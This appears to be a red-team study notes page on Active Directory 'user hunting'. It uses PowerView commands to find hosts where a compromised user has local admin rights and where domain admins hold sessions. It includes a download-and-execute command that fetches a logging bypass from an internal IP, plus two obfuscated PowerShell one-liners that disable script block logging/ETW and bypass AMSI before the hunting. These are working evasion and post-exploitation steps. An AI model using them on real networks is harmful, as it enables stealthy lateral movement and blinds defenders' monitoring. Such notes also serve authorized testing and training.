# User Hunting

## Finding local admin access

From our compromised machine always check where do we have local admin access we can use powerview's below command to find all machines where our current user has local admin access.

```powershell
Find-LocalAdminAccess -Verbose
```

* Find-WMILocalAdminAccess.ps1 and Find-PSRemotingLocalAdminAccess.ps1 powershell scripts can be used for the same purpose where above does not work.

```powershell
. .\Find-PSRemotingLocalAdminAccess
Find-PSRemotingLocalAdminAccess
```

## Find computers where a domain admin has session

This is same as finding local admin access on a computer since server 2019 local administrator privileges are required to list sessions and if we are able to list sessions it means we are local admin on that computer. Before using this powerview command we must first bypass enhanced scriptblock logging and AMSI. Using powershell session do the following.

```powershell
 iex (iwr http://172.16.100.x/sbloggingbypass.txt -UseBasicParsing)
```

OR

{% code overflow="wrap" %}

```powershell
[Reflection.Assembly]::"l`o`AdwIThPa`Rti`AlnamE"(('S'+'ystem'+'.C'+'ore'))."g`E`TTYPE"(('Sys'+'tem.Di'+'agno'+'stics.Event'+'i'+'ng.EventProv'+'i'+'der'))."gET`FI`eLd"(('m'+'_'+'enabled'),('NonP'+'ubl'+'ic'+',Instance'))."seTVa`l`Ue"([Ref]."a`sSem`BlY"."gE`T`TyPE"(('Sys'+'tem'+'.Mana'+'ge'+'ment.Aut'+'o'+'mation.Tracing.'+'PSEtwLo'+'g'+'Pro'+'vi'+'der'))."gEtFIe`Ld"(('e'+'tw'+'Provid'+'er'),('N'+'o'+'nPu'+'b'+'lic,Static'))."gE`Tva`lUe"($null),0)  
```

{% endcode %}

Then bypass AMSI

{% code overflow="wrap" %}

```powershell
S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )
```

{% endcode %}

Now use PowerView's this below function.

```powershell
Find-DomainUserLocation -Verbose
```

## Find computers where a domain admin session is available and current user has admin access

IT means a computer where a domain admin is actively interacting whether accessing some shares or service and has session established and our current user has local admin access to that computer

```powershell
Find-DomainUserLocation -CheckAccess
```

## Find computers (File Servers and Distributed File servers) where a domain admin session is available.

```powershell
Find-DomainUserLocation -Stealth
```